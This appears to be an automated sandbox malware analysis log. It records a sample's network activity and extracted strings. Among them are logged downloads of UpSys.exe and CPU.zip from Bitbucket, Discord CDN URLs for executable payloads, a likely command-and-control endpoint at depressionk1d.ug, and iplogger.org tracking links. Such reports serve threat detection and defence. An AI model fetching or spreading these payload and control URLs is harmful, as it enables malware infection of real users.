      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/4cedbadc-424b-4242-93aa-1dc687b9b639/UpSys.exe?Signature=03SjwtOUVCkSGlVBOddWMUL2kd4%3D&Expires=1636631487&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=W.pANh85KmlWZmruQkzmM9Sllvu_UgzE&response-content-disposition=attachment%3B%20filename%3D%22UpSys.exe%22 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /e8466680-8c82-495b-9e3c-2c79f82869ce/downloads/7737de24-30d9-4daf-b72b-bce98dc0f6f9/CPU.zip?Signature=3Tzq39O6DbHYG0DRC9lAn6yjoV4%3D&Expires=1636631244&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=rNhERZ1bRKwlh0QCY62w5KsnWg9_i2WQ&response-content-disposition=attachment%3B%20filename%3D%22CPU.zip%22 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/UpSys.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /tilttilttilt/test1/downloads/CPU.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitbucket.orgConnection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.5:49762 -> 185.215.113.111:59111
      Source: We7WnoqeXe.exe, 00000001.00000002.390842824.0000000003FAB000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
      Source: rnyuf.exe, 00000013.00000003.470176267.0000000001707000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe
      Source: rnyuf.exe, 00000013.00000003.470128556.00000000016FA000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe84/vms.K
      Source: rnyuf.exe, 00000013.00000003.470128556.00000000016FA000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe84/vms.ex
      Source: rnyuf.exe, 00000013.00000003.453887701.0000000001707000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exePc
      Source: rnyuf.exe, 00000013.00000003.470128556.00000000016FA000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exefC
      Source: rnyuf.exe, 00000013.00000002.567901365.0000000001752000.00000004.00000020.sdmp, rnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
      Source: rnyuf.exe, 00000013.00000002.569193502.0000000004D00000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeH
      Source: rnyuf.exe, 00000013.00000002.569193502.0000000004D00000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeR
      Source: rnyuf.exe, 00000013.00000002.567901365.0000000001752000.00000004.00000020.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeslho9
      Source: rnyuf.exe, 00000013.00000002.567901365.0000000001752000.00000004.00000020.sdmpString found in binary or memory: http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeslhost.e
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: We7WnoqeXe.exe, 00000001.00000002.397564779.0000000007762000.00000004.00000001.sdmp, slhost.exe, 0000000F.00000003.400240423.000002B9A4D87000.00000004.00000001.sdmp, rnyuf.exe, 00000013.00000003.470030983.000000000172B000.00000004.00000001.sdmp, System.exe, 00000021.00000000.529999996.0000027F95AC6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: rnyuf.exe, 00000013.00000003.453353990.000000000172B000.00000004.00000001.sdmp, rnyuf.exe, 00000013.00000003.453787966.00000000016F0000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/
      Source: rnyuf.exe, 00000013.00000003.453353990.000000000172B000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/0E8EE1B8DFF231005E9DC5D8267227684D07A38
      Source: rnyuf.exe, 00000013.00000002.569308596.0000000004D23000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php
      Source: rnyuf.exe, 00000013.00000002.569308596.0000000004D23000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php-
      Source: rnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1
      Source: rnyuf.exe, 00000013.00000003.470030983.000000000172B000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1(
      Source: rnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=14C
      Source: rnyuf.exe, 00000013.00000003.470128556.00000000016FA000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1E
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1Temp
      Source: rnyuf.exe, 00000013.00000002.567901365.0000000001752000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php?scr=1u
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phpG
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.php_
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phpc
      Source: rnyuf.exe, 00000013.00000002.569308596.0000000004D23000.00000004.00000001.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phponProgramFiles(x86)%
      Source: rnyuf.exe, 00000013.00000002.567818881.0000000001707000.00000004.00000020.sdmpString found in binary or memory: http://depressionk1d.ug/k8FppT/index.phpppData
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
      Source: System.exe, 00000021.00000000.529999996.0000027F95AC6000.00000004.00000020.sdmpString found in binary or memory: http://iplogger.org/1fEwd7
      Source: System.exe, 00000021.00000000.529999996.0000027F95AC6000.00000004.00000020.sdmpString found in binary or memory: http://iplogger.org/1fEwd78
      Source: slhost.exe, 0000000F.00000002.550298886.000002B9A4DDA000.00000004.00000020.sdmpString found in binary or memory: http://iplogger.org/1fEwd7N
      Source: slhost.exe, 0000000F.00000002.550298886.000002B9A4DDA000.00000004.00000020.sdmpString found in binary or memory: http://iplogger.org/1fEwd7Z
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: slhost.exe, 0000000F.00000003.398898364.000002B9A4D73000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
      Source: We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
      Source: We7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
